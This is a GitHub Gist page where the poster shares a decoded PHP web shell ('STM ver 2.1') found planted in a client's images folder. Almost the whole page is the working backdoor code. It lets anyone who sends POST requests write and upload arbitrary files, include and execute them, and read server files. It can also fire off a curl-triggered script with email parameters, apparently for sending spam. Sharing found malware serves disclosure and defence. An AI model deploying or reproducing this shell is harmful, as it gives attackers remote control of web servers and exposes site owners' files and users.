Created
April 5, 2013 14:14
-
-
Save pkdavies/5319575 to your computer and use it in GitHub Desktop.
This is the final decoded version of a server hack found on a client's server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (empty ( $_POST ['mode'] ) or empty ( $_POST ['name'] )) | |
| exit ( '0' ); | |
| switch ($_POST ['mode']) { | |
| case 'load' : | |
| if (empty ( $_POST ['data'] )) | |
| exit ( 'no data' ); | |
| $IIIIIIII1Ill = fopen ( $_POST ['name'], 'w' ) or exit ( $_POST ['name'] . ' - load_no [' . dirname ( '/home/client/public_html/images/stm.php' ) . '/' . $_POST ['name'] . ']' ); | |
| fwrite ( $IIIIIIII1Ill, urldecode ( $_POST ['data'] ) ); | |
| fclose ( $IIIIIIII1Ill ); | |
| echo $_POST ['name'] . ' - load_ok'; | |
| exit (); | |
| break; | |
| case 'loadf' : | |
| if (empty ( $_FILES ['upload'] ['tmp_name'] )) | |
| exit ( 'Err_upload ' . print_r ( $_FILES, true ) ); | |
| if (! @move_uploaded_file ( $_FILES ['upload'] ['tmp_name'], $_POST ['name'] )) { | |
| echo $_POST ['name'] . ' - load_no [' . print_r ( $_FILES, true ) . ']'; | |
| exit (); | |
| } | |
| echo $_POST ['name'] . ' - load_ok'; | |
| exit (); | |
| break; | |
| case 'run' : | |
| if (empty ( $_POST ['email'] ) or empty ( $_POST ['bd'] ) or empty ( $_POST ['run'] )) | |
| exit ( '1' ); | |
| $IIIIIIII1I1I = CURL_INIT (); | |
| CURL_SETOPT ( $IIIIIIII1I1I, CURLOPT_URL, $_SERVER ['SERVER_NAME'] . dirname ( $_SERVER ['REQUEST_URI'] ) . '/' . $_POST ['run'] ); | |
| CURL_SETOPT ( $IIIIIIII1I1I, CURLOPT_RETURNTRANSFER, 0 ); | |
| CURL_SETOPT ( $IIIIIIII1I1I, CURLOPT_POST, 1 ); | |
| CURL_SETOPT ( $IIIIIIII1I1I, CURLOPT_POSTFIELDS, 'run=1' . '&' . 'name=' . $_POST ['name'] . '&' . 'email=' . $_POST ['email'] . '&' . 'bd=' . $_POST ['bd'] ); | |
| CURL_SETOPT ( $IIIIIIII1I1I, CURLOPT_CONNECTTIMEOUT, 5 ); | |
| CURL_EXEC ( $IIIIIIII1I1I ); | |
| if (curl_error ( $IIIIIIII1I1I )) { | |
| exit ( curl_error ( $IIIIIIII1I1I ) ); | |
| } | |
| CURL_CLOSE ( $IIIIIIII1I1I ); | |
| exit ( $_POST ['email'] . ' - run_ok' ); | |
| break; | |
| case 'start' : | |
| $IIIIIIIIl11I = dirname ( '/home/client/public_html/images/stm.php' ) . '/' . $_POST ['run']; | |
| if (! is_readable ( $IIIIIIIIl11I )) | |
| exit ( $_POST ['run'] . ' - Err start file' ); | |
| if (file_exists ( dirname ( '/home/client/public_html/images/stm.php' ) . '/lstm.jpg' )) { | |
| if (! @unlink ( dirname ( '/home/client/public_html/images/stm.php' ) . '/lstm.jpg' )) | |
| exit ( 'No Delet lstm' ); | |
| } | |
| @include ($IIIIIIIIl11I); | |
| break; | |
| case 'restart' : | |
| $IIIIIIIIl11I = dirname ( '/home/client/public_html/images/stm.php' ) . '/' . $_POST ['run']; | |
| if (! is_readable ( $IIIIIIIIl11I )) | |
| exit ( $_POST ['run'] . ' - Err restart file' ); | |
| @include ($IIIIIIIIl11I); | |
| break; | |
| case 'read' : | |
| $IIIIIIIIl11I = dirname ( '/home/client/public_html/images/stm.php' ) . '/' . $_POST ['name']; | |
| if (! is_readable ( $IIIIIIIIl11I )) | |
| exit ( $_POST ['name'] . ' - Err file' ); | |
| echo file_get_contents ( $IIIIIIIIl11I ); | |
| exit (); | |
| break; | |
| case 'info' : | |
| exit ( 'STM ver 2.1' ); | |
| break; | |
| default : | |
| exit ( $_POST ['mode'] ); | |
| } | |
| ; | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment